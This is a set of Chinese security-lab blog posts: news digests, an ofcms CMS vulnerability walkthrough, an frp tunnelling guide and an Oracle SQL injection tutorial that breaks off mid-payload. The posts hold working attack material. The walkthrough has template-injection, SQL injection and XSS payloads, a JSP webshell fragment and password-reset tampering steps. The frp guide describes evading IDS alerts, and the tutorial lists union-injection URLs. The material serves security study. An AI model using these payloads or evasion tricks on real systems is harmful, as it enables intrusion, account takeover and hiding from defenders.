免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Safari 15.6.1 修复了被利用的0day漏洞 https://securityaffairs.co/wordpress/134553/security/safari-15-6-1-fixes-zero-day.html 2、谷歌宣布阻止了有史以来最大(4600 万次RPS)的 HTTPS DDoS 攻击 https://securityaffairs.co/wordpress/134542/hacking/google-blocked-largest-ever-https-ddos.html 3、Realtek RCE 漏洞的 PoC 利用代码已在线发布 https://securityaffairs.co/wordpress/134515/breaking-news/realtek-rce-poc-exploit.html 4、黑客使用 Bumblebee Loader 破坏 Active Directory 服务 https://thehackernews.com/2022/08/hackers-using-bumblebee-loader-to.html 5、BlackByte 2.0勒索软件采用新的勒索策略重新归来 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-gang-is-back-with-new-extortion-tactics/ 6、Mandiant称伊朗UNC3890组织攻击以色列航运和其他关键部门 https://www.securityweek.com/iranian-group-targeting-israeli-shipping-and-other-key-sectors 7、自2020年以来，近700万人尝试下载恶意浏览器扩展 https://www.bleepingcomputer.com/news/security/malicious-browser-extensions-targeted-almost-7-million-people/ 8、微软提醒客户注意俄黑客组织SEABORGIUM的网络钓鱼攻击 https://www.cnbeta.com/articles/tech/1305201.htm 9、卡巴斯基实验室正开发防黑客自主品牌手机 https://www.ithome.com/0/635/532.htm 10、报告称大多数经期和孕期跟踪应用在保护用户隐私方面做得很差 https://www.cnbeta.com/articles/tech/1305529.htm

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Apple 修补新的 macOS、iOS 零日漏洞 https://www.securityweek.com/apple-patches-new-macos-ios-zero-days 2、霍尼韦尔报告称针对工业设施的恶意软件52%是通过USB设备进行传播的 https://www.securityweek.com/81-malware-seen-usb-drives-industrial-facilities-can-disrupt-ics-honeywell 3、安卓恶意软件Bugdrop dropper 包含绕过 Google 安全控制的功能 https://securityaffairs.co/wordpress/134508/malware/bugdrop-android-malware.html 4、谷歌修复了被利用的新 Chrome 零日漏洞 https://securityaffairs.co/wordpress/134501/security/google-fifth-chrome-zero-day-exploited.html 5、Electron框架漏洞影响数十个应用程序 https://www.securityweek.com/security-analysis-leads-discovery-vulnerabilities-18-electron-applications 6、英特尔CPU构架漏洞ÆPIC Leak影响大多数10至12代CPU https://securityaffairs.co/wordpress/134478/security/aepic-leak-architecturally-flaw.html 7、微软将在下个月默认禁用Edge中的TLS1.0/1.1支持 https://news.softpedia.com/news/microsoft-to-disable-tls-1-0-and-1-1-next-month-535935.shtml 8、研究人员发现多个影响UWB和RTLS通信的漏洞 https://www.bleepingcomputer.com/news/security/rtls-systems-vulnerable-to-mitm-attacks-location-manipulation/ 9、CS GO皮肤交易网站CS.MONEY约600万美元用户资产遭黑客攻击被盗 https://www.bleepingcomputer.com/news/security/cs-go-trading-site-hacked-to-steal-6-million-worth-of-skins/ 10、Lazarus Group针对使用macOS的求职者投放恶意软件 https://securityaffairs.co/wordpress/134491/malware/north-korea-mac-malware-m1.html

前言 挖了一些phpcms的漏洞了，突然想尝试去挖一下javacms的漏洞，于是写下这篇文章来记录一下自己挖洞的一个流程，希望能帮助到一些正在学习挖洞的师傅们。 确立目标 挖洞的第一步首先是确立一个目标，也就是找个cms来挖，这里可以通过github，gitee或者谷歌百度直接去搜cms。 如果挖洞经验比较少的话建议找一下star少的cms去挖，找到相应的项目，然后点进去，下载源码，然后看项目的介绍，大致了解一下项目的信息和安装的过程。 信息收集 如果确定了目标，接下来我们可以去了解一下他的项目信息，相应的漏洞等。 项目信息除了上面的README以为还可以看看issues模块，这里可能会有一些系统问题或者安装问题，后续我们可能会遇到 漏洞信息的话可以通过cnvd或者其他漏洞平台（直接百度也可以）去查看该系统的漏洞情况。 或者cnvd查看相应的信息，通过查看相应的信息可以提高我们挖洞的效率，我们从中可以知道该项目已经存在漏洞，我们到时候挖就可以看看相应的地方会不会还存在漏洞或者避免挖到别人挖过的漏洞。 环境搭建 上面的信息收集完之后我们就要开始搭建环境了，搭建环境是很关键的一步，由于某些cms安装过程繁琐或者没写好说明，会导致安装出现很多问题甚至装不上，这里我们要注意项目的文档，如果实在安装有问题可以通过相关渠道去联系一下作者或者相应的qq群寻求一下帮助。 本次挖掘的漏洞是ofcms，首先先下载一下源码，然后解压丢一边，回到网页来看一下项目文档。 环境要求 一般项目都会有写环境要求的，我们调整一下就好。 环境准备 环境解压完我们用idea打开，如果发现一些重要目录文件不见了，重开一下就有了。 数据库 首先找到db.properties，如果不能一眼看到可以通过ctrl+shift+f来快速搜索 /ofcms-admin/src/main/resources/dev/conf/db.properties 找到了文件，访问相对应的路径即可，这里我们修改一下数据库用户名和密码，然后点击右边的数据库来测试连接。 然后按数据库信息来修改，然后点击右边的数据库，配置一下。 如果出现以下的错误 Server returns invalid timezone. Go to 'Advanced' tab and set 'serverTimezone' property manually. 这是时区问题，如果配置了环境变量报错，可以通过以下步骤来解决。 win+R cmd mysql -hlocalhost -uroot -p （然后输入数据库密码） show variables like'%time_zone'; set global time_zone = '+8:00'; 没配置环境变量的，看这个文章 https://blog.csdn.net/liuqiker/article/details/102455077配置成功效果图如下 maven 右键项目找到mavne重新加载项目即可 tomcat 在run-configuration中配置tomcat 在Deployment配置一下 一切配置好后点击run启动就可以了，如果遇到端口报错改一下端口，其他的报错就百度一下。 安装过程 这一步就比较简单了，跟着弄就好了。 下一步，然后配置好数据库，这里记得先在数据库中新建个ofcms的库，否则会报Unknown database 'ofcms'的错。 在这里，正常安装步骤是建立好数据库，输入账号密码就等待安装就好。 如果出现以下报错，我们可以通过手工导入数据库，这一种情况在安装别的cms也很常见，在安装遇到数据库问题我们可以直接导入数据库。 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE IF EXISTS `of_cms_access`; CREATE TABLE `of_cms_access` ( `access_i' at line 21 数据库位置ofcms-master\doc\sql，选择相应的版本直接拖进navicat中，然后导入成功后刷新一下就好。 接着将数据库配置文件db-config.properties文件名修改为db.properties，重启一下服务。 漏洞复现 环境搭建完，我们就可以开始挖洞了，然后在这里我建议是能找到该漏洞已存在的文章，我们就先去复现一下，看看别的师傅们的挖过的漏洞，一方面是防止重复，一方面是可以学习一下别人的挖洞思路。 ofcms其实存在挺多漏洞的，这里我们就来简单复现一下，大致看看师傅们的挖洞思路。 任意文件写入 漏洞模板文件这个位置，漏洞的详细分析可以看看https://blog.csdn.net/xd_2021/article/details/123611835 漏洞复现 我们选择任意一个html，然后点击保存抓包，我们可以看到包的信息。 这里就是写入文件，我们在admin目录下写入eek1.xml文件。 通过上面任意文件读取漏洞去读取一下 模板注入漏洞 漏洞在模板注入，这个漏洞主要是pom.xml引入了freemarker-2.3.21依赖，但是留下一些不安全因素导致的，具体漏洞分析可以看这篇http://www.wjhsh.net/bmjoker-p-13653563.html。 漏洞复现 漏洞复现过程比较简单，我们直接在html文件中插入payload就可以了 <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("calc") } 插入后直要访问前台就会出发payload 模板注入的知识点可以看看这篇https://blog.csdn.net/weixin_44522540/article/details/122844068 通过这一个洞，我们可以挖洞的时候可以去注意一下pom.xml引入的模板。 SQL注入漏洞 漏洞分析参考https://blog.csdn.net/xd_2021/article/details/123611835，由于这里的预编译处理不起作用，所以可以执行SQL语句。 漏洞复现 漏洞点在系统设置---代码生成---添加----添加表，在这里抓一下包 直接把payload输进来 update of_cms_ad set ad_id=updatexml(1,concat(1,user()),1) 任意文件上传 漏洞分析在上一篇文章里有说，这里主要就是利用windows或中间件文件上传特性来避免结尾为jsp或jspx 漏洞复现 找到一个上传点然后抓包，我这里是在内容管理----栏目管理----新增----新增用户----上传附件这里抓包的。 eek.jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);sessio 可以看到文件上传进去，而且内容没被修改。 漏洞挖掘 通过上面的内容，我们学习了别的师傅的挖洞思路，接下来就是我自己的挖洞过程了，下面是我挖的几个洞。 首先除了已经存在的漏洞外，我们要大致知道什么漏洞会存在什么地方，例如登录注册界面会出现sql漏洞，逻辑漏洞等，留言框可能会出现xss漏洞，上传头像界面可能会出现任意文件上传漏洞等，信息泄露漏洞也可以通过御剑或者其他工具去扫一下。 XSS漏洞 漏洞复现 对于前台有个客户案例，选择其中一个案例，然后有个留言框，这里直接打入xss的payload就可以了。 <video src=x onerror=alert("eek") /> 漏洞分析 文件位置ofcms-master\ofcms-api\src\main\java\com\ofsoft\cms\api\v1 package com.ofsoft.cms.api.v1; import com.jfinal.plugin.activerecord.Db; import com.ofsoft.cms.api.ApiBase; import com.ofsoft.cms.core.annotation.Action; import com.ofsoft.cms.core.api.ApiMapping; import com.ofsoft.cms.core.api.RequestMethod; import com.ofsoft.cms.core.api.check.ParamsCheck; import com.ofsoft.cms.core.api.check.ParamsCheckType; import com.ofsoft.cms.core.utils.IpKit; import java.util.Map; /** * 评论接口 * * @author OF * @date 2019年2月24日 */ @Action(path = "/comment") public class CommentApi extends ApiBase {   /**     * 获取内容信息     */   @ApiMapping(method = RequestMethod.GET)   @ParamsCheck(           {@ParamsCheckType(name = "comment_content"), @ParamsCheckType(name = "content_id"),                   @ParamsCheckType(name = "site_id")})   public void save() {       try {           Map params = getParamsMap();           params.put("comment_ip", IpKit.getRealIp(getRequest()));           Db.update(Db.getSqlPara("cms.comment.save", params));           rendSuccessJson();       } catch (Exception e) {           e.printStackTrace();           rendFailedJson();       }   } } 请求/api/v1/comment/save.json?comment_content=123&content_id=61&site_id=1&check_status=1&_=1644130926694 这里直接接受请求，未对content的内容进行检测，直接将请求的值存入数据库中，导致存在跨站脚本漏洞。 逻辑缺陷漏洞1 本地环境 现有两个用户信息，系统管理员admin和普通管理员eek，如下是系统管理员的界面。 admin/admin eek/123 超级管理员后台界面。 普通管理员后台界面 漏洞复现 我们先以普通管理员登录 点击右上角，修改密码 在此处burp抓包 修改id为1，密码任意 修改前admin的密码是admin 修改后为admin，密码是eek 漏洞分析 漏洞文件：\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java的respwd方法 ...     public void respwd() {       Map<String, Object> params = getParamsMap();       String password = (String) params.get("password");       String newpassword = (String) params.get("newpassword");       if (!password.equals(newpassword)) {           rendFailedJson("两次密码不一致!");           return;       }       Record record = new Record();       if (!StringUtils.isBlank(password)) {           password = new Sha256Hash(password).toHex();           record.set("user_password", password);       }       record.set("user_id", params.get("user_id"));       try {           Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);           rendSuccessJson();       } catch (Exception e) {           e.printStackTrace();           rendFailedJson(ErrorCode.get("9999"));       }   }... 在此方法中，后台对前端界面的id和两次密码值进行获取，然后传入后端，后端直接将id和密码传入数据库中，让数据库直接更新信息。 这里由于id可控导致用户可以直接修改任意id的密码，导致该地方存在任意用户密码重置。 逻辑缺陷漏洞2 本地环境 数据库信息如下图所示 现在有超级管理员，admin/123 普通管理员，eek/123 漏洞复现 首先以普通管理员身份登录，然后点击右上角，基本资料 在此处burp抓包 修改信息，user_id改为1，密码修改为admin 以系统管理员身份登录 成功登录 漏洞分析 漏洞文件：\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java的update方法 ...     public void update() {       Map<String, Object> params = getParamsMap();       String password = (String) params.get("password");       if (!StringUtils.isBlank(password)) {           password = new Sha256Hash(password).toHex();           params.put("user_password", password);       }       params.remove("password");       String roleId = (String) params.get("role_id");       if (!StringUtils.isBlank(roleId)) {           SqlPara sql = Db.getSqlPara("system.user.role_update", params);           Db.update(sql);       }       params.remove("role_id");       Record record = new Record();       record.setColumns(params);       try {           Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);           rendSuccessJson();       } catch (Exception e) {           e.printStackTrace();           rendFailedJson(ErrorCode.get("9999"));       } } ... 在此方法中，后台管理直接将新增的数据放到数据库中，直接对数据库内容进行更新，未对不合法内容进行检测，导致该地方存在任意用户信息重置。 任意文件读取 漏洞复现 找到模板文件 所对应的路径是\ofcms-master\ofcms-admin\src\main\webapp\WEB-INF\page\default，这里可以通过目录穿越来读取任意文件。 在他的上两级有个web.xml文件，我们尝试读取一些。 这里不能直接编辑，burp抓个包。 web.xml文件如下所示 <!DOCTYPE web-app PUBLIC       "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"       "http://td/web-app_2_3.dtd" > <web-app>   <display-name>Archetype Created Web Application</display-name>   <listener>       <listener-class>org.apache.shiro.web.env.EnvironmentLoaderListener</listener-class>   </listener>   <filter>       <filter-name>shiro</filter-name>       <filter-class>org.apache.shiro.web.servlet.ShiroFilter</filter-class>   </filter>   ......... 读取成功 漏洞分析 漏洞文件位置：ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java漏洞位于该模块的getTemplates方法中 package com.ofsoft.cms.admin.controller.cms; ...   public void getTemplates() {       //当前目录       String dirName = getPara("dir","");       //上级目录       String upDirName = getPara("up_dir","/");       //类型区分           String resPath = getPara("res_path");       //文件目录       String dir = null;       if(!"/".equals(upDirName)){             dir = upDirName+dirName;       }else{             dir = dirName;       }       File pathFile = null;       if("res".equals(resPath)){           pathFile = new File(SystemUtile.getSiteTemplateResourcePath(),dir);       }else {           pathFile = new File(SystemUtile.getSiteTemplatePath(),dir);       }       File[] dirs = pathFile.listFiles(new FileFilter() {           @Override           public boolean accept(File file) {               return file.isDirectory();           }       });       if(StringUtils.isBlank (dirName)){           upDirName = upDirName.substring(upDirName.indexOf("/"),upDirName.lastIndexOf("/"));       }       setAttr("up_dir_name",upDirName);       setAttr("up_dir","".equals(dir)?"/":dir);       setAttr("dir_name",dirName.equals("")?SystemUtile.getSiteTemplatePathName():dirName);       setAttr("dirs", dirs);       /*if (dirName != null) {           pathFile = new File(pathFile, dirName);       }*/       File[] files = pathFile.listFiles(new FileFilter() {           @Override           public boolean accept(File file) {               return !file.isDirectory() && (file.getName().endsWith(".html") || file.getName().endsWith(".xml")                       || file.getName().endsWith(".css") || file.getName().endsWith(".js"));           }       });       setAttr("files", files);       String fileName = getPara("file_name", "index.html");       File editFile = null;       if (fileName != null && files != null && files.length > 0) {           for (File f : files) {               if (fileName.equals(f.getName())) {                   editFile = f;                   break;               }           }           if (editFile == null) {               editFile = files[0];               fileName = editFile.getName();           }       }       setAttr("file_name", fileName);       if (editFile != null) {           String fileContent = FileUtils.readString(editFile);           if (fileContent != null) {               fileContent = fileContent.replace("<", "&lt;").replace(">", "&gt;");               setAttr("file_content", fileContent);               setAttr("file_path", editFile);           }       }       if("res".equals(resPath)) {           render("/admin/cms/template/resource.html");       }else{       render("/admin/cms/template/index.html");       }   } ...... 这里没有对dir和dir_name的值进行不合法输入检测，导致这里可以进行目录穿越，然后后面的就只有对文件是否存在进行判断，若存在则读取。所以此处存在任意文件读取漏洞。 声明：本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本号及原作者无关。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Zoom MacOS版本修补了在 DEF CON 上被披露的严重漏洞 https://www.securityweek.com/zoom-patches-serious-macos-app-vulnerabilities-disclosed-def-con 2、英国饮用水公司South Staffordshire Water遭Clop 勒索软件攻击 https://securityaffairs.co/wordpress/134450/cyber-crime/south-staffordshire-water-cyberattack.html 3、受Twilio 安全漏洞影响，1900名Signal用户电话号码被泄露 https://securityaffairs.co/wordpress/134428/mobile-2/twilio-hack-signal-impacy.html 4、新的 Evil PLC 攻击利用PLC 以破坏 OT 和企业网络 https://thehackernews.com/2022/08/new-evil-plc-attack-weaponizes-plcs-to.html 5、印度金融服务公司 BharatPay 泄露了用户的 PII 和敏感财务数据 https://ciso.economictimes.indiatimes.com/news/bharatpay-finance-services-breached-personal-data-transaction-details-of-37000-users-leaked-online/93586873 6、Andariel在攻击中使用DTrack和Maui勒索软件 https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ 7、卡巴斯基发布2022 Q2威胁演变报告 https://securelist.com/it-threat-evolution-q2-2022/107099/ 8、"五眼"联盟国家参与美国网络司令部大型年度演习 https://www.secrss.com/articles/45833 9、网信办发布国内互联网算法备案清单，含微信、淘宝、抖音等30款App http://www.cac.gov.cn/2022-08/12/c_1661927474338504.htm 10、硬件付费订阅引众怒，黑客向宝马宣战：将免费破解给车主使用 https://www.cnbeta.com/articles/tech/1304555.htm

前言 第一次使用某商设备，不同厂商的规则库不一样，总的来说流量监控很大一部分是基于规则库来实现的，所以在进行内网穿透的时候就要考虑如何bypass设备告警。 环境搭建 ubuntu 公网vps win10内网主机 wget https://github.com/fatedier/frp/releases/download/v0.44.0/frp_0.44.0_linux_amd64.tar.gz 服务端配置 bind_port = 9666   //frp服务端端口 token = 123         //客户端连接时的token认证 dashboard_port=9999 //面板服务端口 dashboard_user=Ggoodstudy   //用户名 dashboard_pwd=xxxx         //密码 enable_prometheus=true log_file=/var/log/frps.log //日志存放位置 log_level=info log_max_days=3     vhost_http_port=9998         //http服务端口 启动 ./frps -c frps.ini 如果后台运行 nohup ./frps -c frps.ini & 访问面板 http://xx.xxx.xx.xx:9666输入账号密码登录 此时服务端的配置已成功，客户端配置 [common] server_addr = xx.xxx.x.x server_port = 9666 token = 123 [rdp] type = tcp local_ip = 127.0.0.1           local_port = 3389 remote_port = 7004   这里设置代理本机的3389和8077端口 mstsc连接到主机 抓取数据包 host xx.xx.xx.xx 主机ip192.168.43.246 这里我们可以看到请求的流量包，在请求服务端的9666端口 详情内容就是 可以看到详细数据包中src_addr为受害主机出口地址，目的端口dst_port为vps的穿透端口7004端口，目的ip为vps的私网地址。 此时的连接状态显示的，同时，查看远程时的连接远程桌面时会产生这样流量特征run_id 另外有特别的发现，虚拟机winserver 2012 R2在运行客户端之后，vps在连接的过程中也能获取到宿主机的用户名 这是一个比较特别的点儿，剩余的流量就是vps和跳板机的流量交互，没有很明显的特征。 回头看某商设备对于frp内网穿透的告警 我们可以对比之前的流量包，缺少的字段且仅有udp端口 这里可能某商的规则id是基于udp_port或者说是version字段而产生的告警行为。 魔改 从几个方面规避流量监测 1.交互量加密 对frp的认证使用tls加密，修改服务端frps.ini tlsonly = true 客户端配置frpc.ini tlsenable = true 2.重写服务端 在上面的流量包中可以看到,在进行交互的时候 服务端会请求客户端配置文件内容proxy_name,那么在定义变量的服务端，可以重写方法 case *msg.NewVisitorConn: if err = svr.RegisterVisitorConn(conn, m); err != nil { xl.Warn("register visitor conn error: %v", err) msg.WriteMsg(conn, &msg.NewVisitorConnResp{ ProxyName: m.ProxyName, Error:     util.GenerateResponseErrorString("register visitor conn error", err, svr.cfg.DetailedErrorsToClient), }) conn.Close() } else { msg.WriteMsg(conn, &msg.NewVisitorConnResp{ ProxyName: m.ProxyName, Error:     "", }) } 在客户端和服务器连接的时候流量特征变成自定义变量即可。 总结 frp的特征比较明显,所以就单纯魔改frp的话除了流量上做加密外，简单的修改特征bypass设备也是可以实现的。 本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本人无关。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、谷歌提高了针对 Linux 内核漏洞的漏洞赏金奖励 https://www.securityweek.com/google-boosts-bug-bounty-rewards-linux-kernel-vulnerabilities 2、微软破坏了与俄有关的 APT组织SEABORGIUM的黑客行动 https://securityaffairs.co/wordpress/134414/apt/seaborgiums-targets-nato.html 3、CopperStealer利用Chromium恶意扩展窃取加密货币 https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html 4、以Evernote为诱饵的网络钓鱼针对医疗供应商 https://www.hipaajournal.com/healthcare-providers-targeted-in-evernote-phishing-campaign/ 5、SOVA安卓银行木马中出现新型勒索软件模块 https://www.darkreading.com/endpoint/ransomware-sova-android-banking-trojan 6、卡巴斯基报告DeathStalker使用的VileRAT程序 https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/ 7、研究人员在商业安全产品中发现盗用OverSight算法 https://www.securityweek.com/researchers-find-stolen-algorithms-commercial-cybersecurity-products 8、恶意PyPI包secretslib在Linux系统执行无文件挖矿程序 https://thehackernews.com/2022/08/newly-uncovered-pypi-package-drops.html 9、 Instagram 被曝通过 App 内浏览器跟踪用户网络活动 https://www.ithome.com/0/634/976.htm 10、利用macOS端Zoom安装器漏洞，黑客可接管用户Mac https://www.cnbeta.com/articles/tech/1304009.htm

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、洛克希德·马丁公司遭Killnet攻击并被窃取数据 https://www.securityweek.com/killnet-releases-proof-its-attack-against-lockheed-martin 2、微软过去的12个月内为漏洞赏金计划支付了 1370 万美元 https://www.securityweek.com/microsoft-paid-137-million-bug-bounty-programs-over-past-year 3、美国政府分享涉嫌 Conti Ransomware 嫌疑人的照片 https://www.securityweek.com/us-government-shares-photo-alleged-conti-ransomware-associate 4、Realtek SDK 高危堆栈溢出漏洞影响20多家厂商生成的路由器 https://www.securityweek.com/realtek-sdk-vulnerability-exposes-routers-many-vendors-remote-attacks 5、使用联发科芯片的小米手机存在漏洞可能允许伪造交易 https://securityaffairs.co/wordpress/134331/hacking/xiaomi-phones-flaw.html 6、CISA、FBI 发布联合公告，警告 Zeppelin 勒索软件攻击 https://securityaffairs.co/wordpress/134350/cyber-crime/zeppelin-ransomware-joint-alert.html 7、0day漏洞被利用入侵超过 1,000 台 Zimbra 电子邮件服务器 https://securityaffairs.co/wordpress/134314/hacking/zimbra-rce-actively-exploited.html 8、研究人员发现三个漏洞允许攻击者绕过 UEFI 安全启动功能 https://securityaffairs.co/wordpress/134334/hacking/uefi-secure-boot-feature-flaw.html 9、英特尔推出针对物理故障注入攻击的保护 https://www.securityweek.com/intel-introduces-protection-against-physical-fault-injection-attacks 10、Black Hat USA 展示了新型 HTTP 请求走私攻击 https://portswigger.net/daily-swig/browser-powered-desync-new-class-of-http-request-smuggling-attacks-showcased-at-black-hat-usa

Oracle Oracle权限分类 权限是用户对一项功能的执行权力。在Oracle中，根据系统的管理方式不同，将 Oracle 权限分为系统权限与实体权限两类。系统权限是指是否被授权用户可以连接到数据库上，在数据库中可以进行哪些系统操作。而实体权限是指用户对具体的模式实体 (schema) 所拥有的权限。 系统权限管理 系统权限：系统规定用户使用数据库的权限。（系统权限是对用户而言)。 DBA:拥有全部特权，是系统最高权限，只有DBA才可以创建数据库结构 RESOURCE:拥有Resource权限的用户只可以创建实体，不可以创建数据库结构 CONNECT:拥有Connect权限的用户只可以登录Oracle，不可以创建实体，不可以创建数据库结构 对于普通用户：授予connect，resource权限 对于DBA用户：授予connect，resource，dba权限 -- 系统权限授予命令： 系统权限只能由DBA用户授出，也就是sys,system(这两个用户是最开始的两个DBA用户) 授权命令：grant connect, resource, dba to username1 , username2...; 普通用户通过授权可以具有与system相同的用户权限，但永远不能达到与sys用户相同的权限，system用户的权限也可以被回收 回收授权命令：revoke connect, resource, dba from system; -- 查询用户拥有那些权限： select * from dba_role_privs; select * from dba_sys_privs; select * from role_sys_privs; -- 查询自己拥有那些系统权限 select * from session_privs; -- 删除用户 drop user [username] cascade; -- 加上cascade则将用户连同其创建的东西全部删除 -- 系统权限传递 增加 WITH ADMIN OPTION 选项，则得到的权限可以传递。 grant connect, resorce to user50 with admin option; -- 系统权限回收，只能由DBA用户回收 revoke connect, resource, dba from system; -- 说明 1. 如果使用WITH ADMIN OPTION为某个用户授予系统权限，那么对于被这个用户授予相同权限的所有用户来说，取消该用户的系统权限并不会级联取消这些用户的相同权限。 2. 系统权限无级联，即A授予B权限，B授予C权限，如果A收回B的权限，C的权限不受影响；系统权限可以跨用户回收，即A可以直接收回C用户的权限。 实体权限管理 实体权限：某种权限用户对其它用户的表或视图的存取权限。（是针对表或视图而言的）。 select, update, insert, alter, index, delete, all //all 包括所有权限 execute // 执行存储过程权限 -- 授权用户表操作 grant select, update, insert on product to user02; grant all on product to user02; 上述两条命令是 除drop之外所有对 product表的操作授予 user02 用户 -- 授予全部用户表的操作权限 grant all on product to public; # all不包括 drop 权限 -- 实体权限传递 grant select, update on product to user02 with grant option; user02得到权限，并可以传递。 -- 实体权限的回收 Revoke select, update on product from user02; 传递的权限将全部消失 -- 说明 1. 如果取消某个用户的对象权限，那么对于这个用户使用WITH GRANT OPTION授予权限的用户来说，同样还会取消这些用户的相同权限，也就是说取消授权时级联的。 角色管理 -- 建立一个角色 create role role1; -- 为角色授权 grant create any table,create procedure to role1; -- 授权角色给用户 grant role1 to user1; -- 查看角色所包含的权限 select * from role_sys_privs; -- 创建带有口令的角色（在生效带有口令的角色时必须提供口令） create role role1 identified by password1; -- 修改角色，设置是否需要口令 alter role role1 not identified; alter role role1 identified by password1; -- 设置当前用户要生效的角色 角色的生效是一个什么概念呢？假设用户a有b1,b2,b3三个角色，那么如果b1未生效，则b1所包含的权限对于a来讲是不拥有的，只有角色生效了，角色内的权限才作用于用户，最大可生效角色数由参数MAX_ENABLED_ROLES设定；在用户登录后，oracle将所有直接赋给用户的权限和用户默认角色中的权限赋给用户。 set role role1; # 使role1生效 set role role,role2; # 使role1,role2生效 set role role1 identified by password1; # 使用带有口令的role1生效 set role all; # 使用该用户的所有角色生效 set role none; # 设置所有角色失效 set role all except role1; # 除role1外的该用户的所有其它角色生效。 select * from SESSION_ROLES; # 查看当前用户的生效的角色。 -- 修改指定用户，设置其默认角色 alter user user1 default role role1; alter user user1 default role all except role1; -- 删除角色 drop role role1； 角色删除后，原来拥用该角色的用户就不再拥有该角色了，相应的权限也就没有了。 -- 说明 1. 无法使用WITH GRANT OPTION为角色授予对象权限 2. 可以使用WITH ADMIN OPTION 为角色授予系统权限,取消时不是级联 PL/SQL语言 PL/SQL 也是一种程序语言，叫做过程化 SQL 语言（Procedual Language/SQL）。 PL/SQL 是 Oracle 数据库对 SQL 语句的扩展。在普通 SQL 语句的使用上增加了编程语言的特点，所以 PL/SQL 就是把数据操作和查询语句组织在 PL/SQL 代码的过程性单元中，通过逻辑判断、循环等操作实现复杂的功能或者计算的程序语言。在 PL/SQL 编程语言是由甲骨文公司在 20 世纪 80 年代，作为 SQL 程序扩展语言和 Oracle 关系数据库开发。 基本结构如下： DECLARE     BEGIN     EXCEPTION     END; SQL 注入需注意的规则 Oracle 使用查询语言获取需要跟上表名，这一点和 Access 类似，没有表的情况下可以使用 dual 表，dual 是 Oracle 的虚拟表，用来构成 select 的语法规则，Oracle 保证 dual 里面永远只有一条记录。 Oracle 的数据库类型是强匹配，所以在 Oracle 进行类似 Union 查询数据时必须让对应位置上的数据类型和表中的列的数据类型是一致的，也可以使用 NULL 代替某些无法快速猜测出的数据类型位置，这一点和 SQL Server 类似。 Oracle 和 mysql 不一样，分页中没有 limit，而是使用三层查询嵌套的方式实现分页 例如: SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >=0 Oracle 的单行注释符号是 --，多行注释符号 /**/。 Oracle 数据库包含了几个系统表，这几个系统表里存储了系统数据库的表名和列名，如 user_tab_columns，all_tab_columns，all_tables，user_tables 系统表就存储了用户的所有的表、列名，其中 table_name 表示的是系统里的表名，column_name 里的是系统里存在的列名。 Oracle 使用 || 拼接字符串（在 URL 中使用编码 %7c 表示），concat() 函数也可以实现两个字符串的拼接 联合查询注入 Payload空格有问题，可以放在vscode中查看 # 判断注入点 所有数据库方式都一样 # 判断列数 依旧提交 order by 去猜测显示当前页面所用的 SQL 查询了多少个字段，也就是确认查询字段数。 ?id=1 order by 3 --+ ?id=1 order by 4 --+ # 判断回显点 ?id=-1 union select null,null,null from dual --+ ?id=-1 union select 1,'2','3' from dual --+ # 获取数据库基本信息 ?id=-1 union select 1,(select banner from sys.v_$version where rownum=1 ),'3' from dual --+ ?id=-1 union select 1,(select instance_name from v_$instance),'3' from dual --+ # 获取数据库名，即用户名 Oracle 没有数据库名的概念，所谓数据库名，即数据表的拥有者，也就是用户名。 1. 获取第一个用户名 ?id=-1 union select 1,(select username from all_users where rownum=1),'3' from dual --+ 2. 获取第二个用户名 ?id=-1 union select 1,(select username from all_users where rownum=1 and username not in ('SYS')),'3' from dual --+       3. 获取当前用户名 ?id=-1 union select 1,(SELECT user FROM dual),'3' from dual --+ # 获取表名 1. 获取Test用户第一张表 ?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST'),'3' from dual --+ 2. 获取Test用户第二张表 ?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST' and 